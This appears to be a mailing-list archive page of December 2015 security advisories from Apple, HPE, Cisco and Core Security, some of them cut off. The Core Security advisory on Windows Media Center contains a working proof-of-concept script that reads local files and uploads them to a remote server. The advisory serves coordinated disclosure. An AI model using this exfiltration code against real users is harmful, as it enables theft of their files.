iOS 9.2 is now available and addresses the following:

AppleMobileFileIntegrity
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  An access control issue was addressed by preventing
modification of access control structures.
CVE-ID
CVE-2015-7055 : Apple

AppSandbox
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  A malicious application may maintain access to Contacts
after having access revoked
Description:  An issue existed in the sandbox's handling of hard
links. This issue was addressed through improved hardening of the app
sandbox.
CVE-ID
CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University
POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North
Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi
of TU Darmstadt

CFNetwork HTTPProtocol
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  An attacker with a privileged network position may be able
to bypass HSTS
Description:  An input validation issue existed within URL
processing. This issue was addressed through improved URL validation.
CVE-ID
CVE-2015-7094 : Tsubasa Iinuma (@llamakko_cafe) of Gehirn Inc. and
Muneaki Nishimura (nishimunea)

Compression
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  An uninitialized memory access issue existed in zlib.
This issue was addressed through improved memory initialization and
additional validation of zlib streams.
CVE-ID
CVE-2015-7054 : j00ru

CoreGraphics
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  Processing a maliciously crafted font file may lead to
arbitrary code execution
Description:  A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team

CoreMedia Playback
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  Multiple memory corruption issues existed in the
processing of malformed media files. These issues were addressed
through improved memory handling.
CVE-ID
CVE-2015-7074 : Apple
CVE-2015-7075

dyld
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  Multiple segment validation issues existed in dyld.
These were addressed through improved environment sanitization.
CVE-ID
CVE-2015-7072 : Apple
CVE-2015-7079 : PanguTeam

GPUTools Framework
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  Multiple path validation issues existed in Mobile
Replayer. These were addressed through improved environment
sanitization.
CVE-ID
CVE-2015-7069 : Luca Todesco (@qwertyoruiop)
CVE-2015-7070 : Luca Todesco (@qwertyoruiop)

iBooks
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  Parsing a maliciously crafted iBooks file may lead to
disclosure of user information
Description:  An XML external entity reference issue existed with
iBook parsing. This issue was addressed through improved parsing.
CVE-ID
CVE-2015-7081 : Behrouz Sadeghipour (@Nahamsec) and Patrik Fehrenbach
(@ITSecurityguard)

ImageIO
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  Processing a maliciously crafted image may lead to arbitrary
code execution
Description:  A memory corruption issue existed in ImageIO. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-7053 : Apple

IOHIDFamily
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  Multiple memory corruption issues existed in
IOHIDFamily API. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-7111 : beist and ABH of BoB
CVE-2015-7112 : Ian Beer of Google Project Zero

IOKit SCSI
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  A malicious application may be able to execute arbitrary
code with kernel privileges
Description:  A null pointer dereference existed in the handling of a
certain userclient type.

[CORE-2015-0014] - Microsoft Windows Media Center link file incorrectly resolved reference

2015-12-10 Thread CORE Advisories Team 
1. Advisory Information

Title: Microsoft Windows Media Center link file incorrectly resolved reference
Advisory ID: CORE-2015-0014
Advisory URL: 
http://www.coresecurity.com/advisories/microsoft-windows-media-center-link-file-incorrectly-resolved-reference
Date published: 2015-12-08
Date of last update: 2015-12-04
Vendors contacted: Microsoft
Release mode: Coordinated release

2. Vulnerability Information

Class: Use of Incorrectly-Resolved Name or Reference [CWE-706]
Impact: Information leak
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2015-6127

 

3. Vulnerability Description

The 'application' tag in Microsoft [1] Windows Media Center link files (.mcl 
extension) can include a 'run' parameter, which indicates the path of a file to 
be launched when opening the MCL file, or a 'url' parameter, which indicates 
the URL of a web page to be loaded within the Media Center's embedded web 
browser.

A specially crafted MCL file having said 'url' parameter pointing to the MCL 
file itself can trick Windows Media Center into rendering the very same MCL 
file as a local HTML file within the Media Center's embedded web browser.

4. Vulnerable Packages

Windows 7 for x64-based Systems Service Pack 1 (with Internet Explorer 11 
installed)
Other versions are probably affected too, but they were not checked.

5. Vendor Information, Solutions and Workarounds

Microsoft posted the following Security Bulletin: MS15-134 [2]

6. Credits

This vulnerability was discovered and researched by Francisco Falcon from Core 
Exploits Team. The publication of this advisory was coordinated by Joaquín 
Rodríguez Varela from the Core Advisories Team.

 

7. Technical Description / Proof of Concept Code

The ehexthost.exe binary, part of Windows Media Center, loads the given URL 
into an embedded instance of Internet Explorer running in the local machine 
zone, but it doesn't opt-in for the FEATURE_LOCALMACHINE_LOCKDOWN IE security 
feature, therefore this situation can be leveraged by an attacker to read and 
exfiltrate arbitrary files from a victim's local filesystem by convincing him 
to open a malicious MCL file.

The proof-of-concept shows an MCL file with embedded HTML + JS code, 
referencing itself in the 'url' parameter. Unlike what happens when loading a 
local HTML file into Internet Explorer 11, the JS code included here will 
automatically run with no prompts, and it will be able to read arbitrary local 
files using the MSXML2.XMLHTTP ActiveX object. Those read files then can be 
uploaded to an arbitrary remote web server.

Also note that, in order for the PoC to work, the value of the 'url' parameter 
must match the name of the MCL file.

7.1. Proof of Concept

A new file should be created with the name "poc-microsoft.mcl" and with the 
following content:

 








function do_upload(fname, data){
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", "http://192.168.1.50/uploadfile.php";, true);
xmlhttp.setRequestHeader("Content-type", "multipart/form-data");
xmlhttp.setRequestHeader("Connection", "close");
xmlhttp.onreadystatechange = function(){if (xmlhttp.readyState == 
4){alert(fname + " done.");}}
xmlhttp.send(new Uint8Array(data));
}


function read_local_file(filename){
/* Must use this one, XMLHttpRequest() doesn't allow to read local 
files */
var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlhttp.open("GET", filename, false);
xmlhttp.send();
return xmlhttp.responseBody.toArray();
}


function upload_file(filename){
try{
do_upload(filename, read_local_file(filename));
}catch(e){
alert(filename + " error: " + e);
}
}


upload_file("file:///C:/Windows/System32/calc.exe");






 
 

8. Report Timeline

2015-09-24: Core Security sent the first notification to Microsoft.
2015-09-24: Microsoft acknowledged receipt of the email and requested a draft 
version of the advisory.
2015-09-25: Core Security sent Microsoft the draft version of the advisory 
including a PoC.
2015-09-25: Microsoft cased the report under MSRC 31305.
2015-10-02: Core Security requested Microsoft provide a status update and 
confirmation of the reported bug.
2015-10-02: Microsoft informed Core Security that they were able to reproduce 
the issue. They were still reviewing it to determine if they would address it 
in a security release.
2015-10-07: Core Security requested Microsoft let us know once they made a 
decision.
2015-10-08: Microsoft informed Core Security they would keep us updated.
2015-10-26: Core Security asked Microsoft if there were any updates regarding 
the reported bug and if they had an estimated time of availability.
2015-10-27: Microsoft informed Core Security that they would be pursuing a fix 
for the reported issue and are working on a release date for it.

APPLE-SA-2015-12-08-2 tvOS 9.1

2015-12-10 Thread Apple Product Security 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

APPLE-SA-2015-12-08-2 tvOS 9.1

tvOS 9.1 is now available and addresses the following:

AppleMobileFileIntegrity
Available for:  Apple TV (4th generation)
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  An access control issue was addressed by preventing
modification of access control structures.
CVE-ID
CVE-2015-7055 : Apple

AppSandbox
Available for:  Apple TV (4th generation)
Impact:  A malicious application may maintain access to Contacts
after having access revoked
Description:  An issue existed in the sandbox's handling of hard
links. This issue was addressed through improved hardening of the app
sandbox.
CVE-ID
CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University
POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North
Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi
of TU Darmstadt

Compression
Available for:  Apple TV (4th generation)
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  An uninitialized memory access issue existed in zlib.
This issue was addressed through improved memory initialization and
additional validation of zlib streams.
CVE-ID
CVE-2015-7054 : j00ru

Configuration Profiles
Available for:  Apple TV (4th generation)
Impact:  A local attacker may be able to install a configuration
profile without admin privileges
Description:  An issue existed when installing configuration
profiles. This issue was addressed through improved authorization
checks.
CVE-ID
CVE-2015-7062 : David Mulder of Dell Software

CoreGraphics
Available for:  Apple TV (4th generation)
Impact:  Processing a maliciously crafted font file may lead to
arbitrary code execution
Description:  A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team

CoreMedia Playback
Available for:  Apple TV (4th generation)
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  Multiple memory corruption issues existed in the
processing of malformed media files. These issues were addressed
through improved memory handling.
CVE-ID
CVE-2015-7074
CVE-2015-7075 : Apple

Disk Images
Available for:  Apple TV (4th generation)
Impact:  A local user may be able to execute arbitrary code with
kernel privileges
Description:  A memory corruption issue existed in the parsing of
disk images. This issue was addressed through improved memory
handling.
CVE-ID
CVE-2015-7110 : Ian Beer of Google Project Zero

dyld
Available for:  Apple TV (4th generation)
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  Multiple segment validation issues existed in dyld.
These were addressed through improved environment sanitization.
CVE-ID
CVE-2015-7072 : Apple
CVE-2015-7079 : PanguTeam

ImageIO
Available for:  Apple TV (4th generation)
Impact:  Processing a maliciously crafted image may lead to arbitrary
code execution
Description:  A memory corruption issue existed in ImageIO. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-7053 : Apple

IOAcceleratorFamily
Available for:  Apple TV (4th generation)
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  A memory corruption issue existed in
IOAcceleratorFamily. This issue was addressed through improved memory
handling.
CVE-ID
CVE-2015-7109 : Juwei Lin of TrendMicro

IOHIDFamily
Available for:  Apple TV (4th generation)
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  Multiple memory corruption issues existed in
IOHIDFamily API. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-7111 : beist and ABH of BoB
CVE-2015-7112 : Ian Beer of Google Project Zero

IOKit SCSI
Available for:  Apple TV (4th generation)
Impact:  A malicious application may be able to execute arbitrary
code with kernel privileges
Description:  A null pointer dereference existed in the handling of a
certain userclient type. This issue was addressed through improved
validation.
CVE-ID
CVE-2015-7068 : Ian Beer of Google Project Zero

Kernel
Available for:  Apple TV (4th generation)
Impact:  A local application may be able to cause a denial of service
Description:  Multiple denial of service issues were addressed
through improved memory handling.
CVE-ID
CVE-2015-7040 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7041 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7042 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7043 : Tarjei Mandt (@kernelpool)

Kernel
Available for:  Apple TV (4th generation)
Impact:  A local user may be able to execute arbitrary code with
kernel privileges
Description:  Multiple memory corruption issues existed in the
kernel. These

[security bulletin] HPSBHF03432 rev.1 - HPE Networking Comware 5, Comware 5 Low Encryption SW, Comware 7, VCX Using NTP, Remote Access Restriction Bypass and Code Execution

2015-12-10 Thread security-alert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n
a-c04916783

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04916783
Version: 1

HPSBHF03432 rev.1 - HPE Networking Comware 5, Comware 5 Low Encryption SW,
Comware 7, VCX Using NTP, Remote Access Restriction Bypass and Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-12-09
Last Updated: 2015-12-09

Potential Security Impact: Remote Access Restriction Bypass, Code Execution

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HPE Networking
Comware 5, Comware 5, Low Encryption SW, Comware 7, and VCX, Using NTP. The
vulnerabilities could be remotely exploited resulting in resulting in remote
access restriction bypass and code execution.

References:

SSRT101878
CVE-2014-9293
CVE-2014-9294
CVE-2014-9295

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

See the RESOLUTION
 section for a list of impacted hardware and Comware 5, Comware 5 Low
Encryption SW, Comware 7, and VCX versions.

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2014-9293(AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
CVE-2014-9294(AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
CVE-2014-9295(AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION
Hewlett Packard Enterprise has provided updated Comware 5, Comware 5 Low
Encryption SW, Comware 7 and VCX to address this on Impacted Hewlett Packard
Enterprise products. Family
 Fixed Version
 HP Branded Products Impacted
 H3C Branded Products Impacted
 CVE #

8800 (Comware 5)
 R3627P04
 JC137A HP 8805/8808/8812 (2E) Main Control Unit Module, JC138A HP
8805/8808/8812 (1E) Main Control Unit Module, JC141A HP 8802 Main Control
Unit Module, JC147A HP 8802 Router Chassis, JC147B HP 8802 Router Chassis,
JC148A HP 8805 Router Chassis, JC148B HP 8805 Router Chassis, JC149A HP 8808
Router Chassis, JC149B HP 8808 Router Chassis, JC150A HP 8812 Router Chassis,
JC150B HP 8812 Router Chassis, JC596A HP 8800 Dual Fabric Main Processing
Unit, JC597A HP 8800 Single Fabric Main Processing Unit

 CVE-2014-9295

A6600 (Comware 5)
 R3303P18
 JC165A HP 6600 RPE-X1 Router Module, JC177A HP 6608 Router, JC177B HP 6608
Router Chassis, JC178A HP 6604 Router Chassis, JC178B HP 6604 Router Chassis,
JC496A HP 6616 Router Chassis, JC566A HP 6600 RSE-X1 Router Main Processing
Unit, JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit, JG781A HP
6600 RPE-X1 TAA-compliant Main Processing Unit

 CVE-2014-9295

HSR6602 (Comware 5)
 R3303P18
 JC176A HP 6602 Router Chassis, JG353A HP HSR6602-G Router, JG354A HP
HSR6602-XG Router, JG355A HP 6600 MCP-X1 Router Main Processing Unit, JG356A
HP 6600 MCP-X2 Router Main Processing Unit, JG776A HP HSR6602-G TAA-compliant
Router, JG777A HP HSR6602-XG TAA-compliant Router, JG778A HP 6600 MCP-X2
Router TAA-compliant Main Processing Unit

 CVE-2014-9295

HSR6800 (Comware 5)
 R3303P18
 JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A
HP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router Main Processing
Unit, JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit

 CVE-2014-9295

MSR20 (Comware 5)
 R2513P45
 JD432A HP A-MSR20-21 Router, JD662A HP MSR20-20 Router, JD663A HP A-MSR20-21
Router, JD663B HP MSR20-21 Router, JD664A HP MSR20-40 Router, JF228A HP
MSR20-40 Router, JF283A HP MSR20-20 Router

 CVE-2014-9295

MSR20-1X (Comware 5)
 R2513P45
 JD431A HP MSR20-10 Router, JD667A HP MSR20-15 IW Multi-Service Router,
JD668A HP MSR20-13 Multi-Service Router, JD669A HP MSR20-13 W Multi-Service
Router, JD670A HP MSR20-15 A Multi-Service Router, JD671A HP MSR20-15 AW
Multi-Service Router, JD672A HP MSR20-15 I Multi-Service Router, JD673A HP
MSR20-11 Multi-Service Router, JD674A HP MSR20-12 Multi-Service Router,
JD675A HP MSR20-12 W Multi-Service Router, JD676A HP MSR20-12 T1
Multi-Service Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A
Router, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP
MSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router,
JF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP
MSR20-15-A-W Router, JF817A HP MSR20-15 Router, JG209A HP MSR20-12-T-W Router
(NA), JG210A HP MSR20-13-W Router (NA)
 H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1, H3C RT-MSR2015-AC-OVS-AW-H3
(0235A393), H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C
RT-MSR2015-AC-OVS-IW-H3 (0235A38V), H3C MSR 20-11 (0235A31V), H3C MSR 20-12
(0235A32E), H3C MSR 20-12 T1 (0235A32B),

APPLE-SA-2015-12-08-5 Safari 9.0.2

2015-12-10 Thread Apple Product Security 

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

APPLE-SA-2015-12-08-5 Safari 9.0.2

Safari 9.0.2 is now available and addresses the following:

WebKit
Available for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,
OS X El Capitan v10.11 and v10.11.1
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-7048 : Apple
CVE-2015-7095 : Apple
CVE-2015-7096 : Apple
CVE-2015-7097 : Apple
CVE-2015-7098 : Apple
CVE-2015-7099 : Apple
CVE-2015-7100 : Apple
CVE-2015-7101 : Apple
CVE-2015-7102 : Apple
CVE-2015-7103 : Apple
CVE-2015-7104 : Apple

WebKit
Available for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,
OS X El Capitan 10.11 and v10.11.1
Impact:  Visiting a maliciously crafted website may reveal a user's
browsing history
Description:  An insufficient input validation issue existed in
content blocking. This issue was addressed through improved content
extension parsing.
CVE-ID
CVE-2015-7050 : Luke Li and Jonathan Metzman

Installation note:

Safari 9.0.2 may be obtained from the Mac App Store.

Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-BEGIN PGP SIGNATURE-
Comment: GPGTools - https://gpgtools.org

iQIcBAEBCgAGBQJWZzRXAAoJEBcWfLTuOo7tp/kP/1QG495DAo4BKcJwr5oHxeK+
V0cld44Ot1F9+m8Pd2Il5kkE2mxEGnvOdtEQM0mOT80qfdTVi9zD4ypnFWkBcob1
tV0hEa7/LxMe1OtDMeeNM+qW22Ap6RO8o7v6mCzdn72ds0xSmiPFGuQ1RiRflKRj
MjU+k61a3oEe2/rkvbBfuDSIm+4yZo1PjTDI02UoD5JC2nJ0Dlk6978hF6lLSrCv
28UR0i6NijI3Wa2Uq3gSA+qY9bo02sC1XOEveTfftLUfl1QOID0VZGHHnrao4mfx
LpxYJR2XJpTvNs1x3lCOcTYWJr4Ju99/ZFkHneAj2OQEvOhP/CHuqUmUglHW9UMW
CwQKAVZD242e6qPUu0xaW/nH4dQHbridWPWR3MfwiFj6Vbzc3Wpc+tx7LGdlFuhG
9/goo4MMI7QFdxFXD3bbcOhYRi6DbqJUSxTvWfpC2sssFmZ/N5kmr0w2ccXMUAGc
Ez2M8Wm+gVYlCeBMS3rtPkxVcayzHZnxhj+3Fa7Qh3FAY9NdnJ/UA6xJdPrQvTpd
DJsQUIK9Ung2c1D3kGGN6QgnUCgL3CtZ7RCSgPD8Zqs4q6Zhuwq6uquC3EDIZO2y
HgMF1dRKihaXV5URz9IXfQAHQvbR1PD5e/KuL32bEtXwE0Oxocp1jTrIeIrW71JZ
2qcwUzBx5TzaQfLl+Rk1
=7iMd
-END PGP SIGNATURE-

[security bulletin] HPSBHF03433 SSRT102964 rev.1 - HP-UX Running Mozilla Firefox and Thunderbird, Remote Disclosure of Information

2015-12-10 Thread security-alert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n
a-c04918839

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04918839
Version: 1

HPSBHF03433 SSRT102964 rev.1 - HP-UX Running Mozilla Firefox and Thunderbird,
Remote Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-12-09
Last Updated: 2015-12-09

Potential Security Impact: Remote Disclosure of Information

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX Running
Mozilla Firefox and Thunderbird. This may allow remote disclosure of
information.

Note: This is the TLS vulnerability using US export-grade 512-bit keys in
Diffie-Hellman key exchange known as "Logjam" which could be exploited
remotely resulting in disclosure of information.

References:

CVE-2015-4000
PSRT102964

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP-UX Thunderbird v2.0.0.24 HP-UX Thunderbird
HP-UX Firefox browser v3.5.09.00 HP-UX Firefox browser

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2015-4000(AV:N/AC:M/Au:N/C:N/I:P/A:N)   4.3
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided the following configuration instructions to resolve this
vulnerability.

Do the following to mitigate the logjam issue in HP-UX Firefox and
Thunderbird:

HP-UX Firefox browser:

Visit about:config in the Firefox browser Search for ssl3 and disable
DHE_EXPORT ciphers by setting below preferences values to false.
security.ssl3.dhe_rsa_aes_128_sha
security.ssl3.dhe_rsa_aes_256_sha
Restart the browser

HP-UX Thunderbird:

Select "Preferences" from the "Edit" menu
Select "Advanced" Tab and then click on "Config Editor" button Search for
security.ssl3.dhe_rsa_aes and disable DHE_EXPORT ciphers by setting below
preference values to false.
security.ssl3.dhe_rsa_aes_128_sha
security.ssl3.dhe_rsa_aes_256_sha

HISTORY
Version:1 (rev.1) - 9 December 2015 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability with any HPE supported
product, send Email to: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2015 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBAgAGBQJWaKP3AAoJEGIGBBYqRO9/QcEIAMOIYJMgHo5zM75Q0egT3yHs
xEJL1VDjeGlijoYLlM32UihFjqP2x2af2Snx03xHpF01/FEQdup8KRHs4F320QYH
qK3ruL9An4Urg6jNjv2J+1lOPYdHzwvKIpYMXBpMoPlHogOgSaB9g9h4mrp4FEDl
StS7MvvLRok/2/kDWtETI8kGJExj0Jxfb0sIQ9Fv6ext3qYTZiexUwpll9GCFEeV
ZfgC9zA2Gh5Hsyj+Docs5ReDgfDPUDV9NpQAVhsqS1fuAl+FTetrFvypUQPdHR0F
wMLiorlK9Y3A+IJs/PpTe1cgrRoDbHS1buZYUCFjAMXDPo4BU0XVmQmFsU/suuY=
=qla+
-END PGP SIGNATURE-

Cisco Security Advisory: Cisco Prime Collaboration Assurance Default Account Credential Vulnerability

2015-12-10 Thread Cisco Systems Product Security Incident Response Team 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Cisco Security Advisory: Cisco Prime Collaboration Assurance Default Account 
Credential Vulnerability

Advisory ID: cisco-sa-20151209-pca

Revision 1.0

For Public Release  2015 December 9 16:00 UTC (GMT)

+-

Summary
===

A vulnerability in Cisco Prime Collaboration Assurance (PCA) Software could 
allow an unauthenticated, remote attacker to log in to the system shell with 
the default cmuser user account and access the shell with a limited set of 
permissions.

The vulnerability is due to an undocumented account that has a default and 
static password. This account is created during installation and cannot be 
changed or deleted without impacting the functionality of the system. The first 
time this account is used the system will request that the user change the 
default password.

An attacker could exploit this vulnerability by remotely connecting to the 
affected system via SSH by using the undocumented account. Successful 
exploitation could allow the attacker to access the system with the privileges 
of the cmuser user. This vulnerability allows the attacker to: access some 
sensitive data, such as the password file, system logs, and Cisco PCA database 
information; modify some data; run some internal executables; and potentially 
make the system unstable or inaccessible.

Cisco has released software updates that address this vulnerability. 
Workarounds are available.

This advisory is available at the following link: 
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-pca


-BEGIN PGP SIGNATURE-
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - https://gpgtools.org

iQIcBAEBCgAGBQJWaCspAAoJEIpI1I6i1Mx3z2MP/381uF5+mIQ0mw/T3wLa3BIF
q+N8NG6ZlIZuQS8gtKwI9Ywl2K1GKgyyPdugsZ4lLli0Trp2tX7V8VoifX2vFGD4
nHk7/vEAVCQ8p3SZtO13ObgHOYVfAYjtm2ijSxEZYbcsM21zMnV9551edr1XCgNp
MbIoUnhWzepO3ps6neirtN5ye7np7iPXiGrH98tAW6OxCZ16VOEp6tQPEzyXTHRz
8cS466q/xiltGiknANP/R4IY1L7vVAF8+mksJaFpjXsr6jBHhDFBCic1kPkJSUno
SWfDz8vCu9DfzraaR4/x9madU5qcZRElpJUPsH0LKFAdGTSD80OiYpHbK9HcdoWI
KafzzlNnA5iocE4I3vrxEG/hCwwbjj47XMY7mlVW46MJeopzoA71t7jF9KFpyJJs
xsz9rORMXcswU46ZC+rwDiUTBBpreOJJCe8WCLzhepn1LRrJyvmTSQqzHTcpK2xA
JNos6kMSU1xWIJe2J/7hqKU5VbPXGHuARI4wpatzGsSFLS9THCxrcBj43Gfd8zo/
PLR4ipJVenbBRQjEpxPTGDUltkMrdmB84iN8mB2IcfkrUXfMR6hRZijhRwcq2cVu
iByoDe9Zn5H5pYbSMUXM2cNVGf+AuNYFB/CUoULC5JrKMq+1JUt4lsyL1NIC5JeR
HfD0Xf/4bKhC8z2kBLAe
=O1HB
-END PGP SIGNATURE-

APPLE-SA-2015-12-08-4 watchOS 2.1

2015-12-10 Thread Apple Product Security 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

APPLE-SA-2015-12-08-4 watchOS 2.1

watchOS 2.1 is now available and addresses the following:

AppSandbox
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may maintain access to Contacts
after having access revoked
Description:  An issue existed in the sandbox's handling of hard
links. This issue was addressed through improved hardening of the app
sandbox.
CVE-ID
CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University
POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North
Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi
of TU Darmstadt

Compression
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  An uninitialized memory access issue existed in zlib.
This issue was addressed through improved memory initialization and
additional validation of zlib streams.
CVE-ID
CVE-2015-7054 : j00ru

CoreGraphics
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Processing a maliciously crafted font file may lead to
arbitrary code execution
Description:  A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team

CoreMedia Playback
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  A memory corruption issue existed in the processing of
malformed media files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-7075

dyld
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  A segment validation issue existed in dyld. This was
addressed through improved environment sanitization.
CVE-ID
CVE-2015-7072 : Apple

FontParser
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Processing a maliciously crafted font file may lead to
arbitrary code execution
Description:  Multiple memory corruption issues existed in the
processing of font files. These issues were addressed through
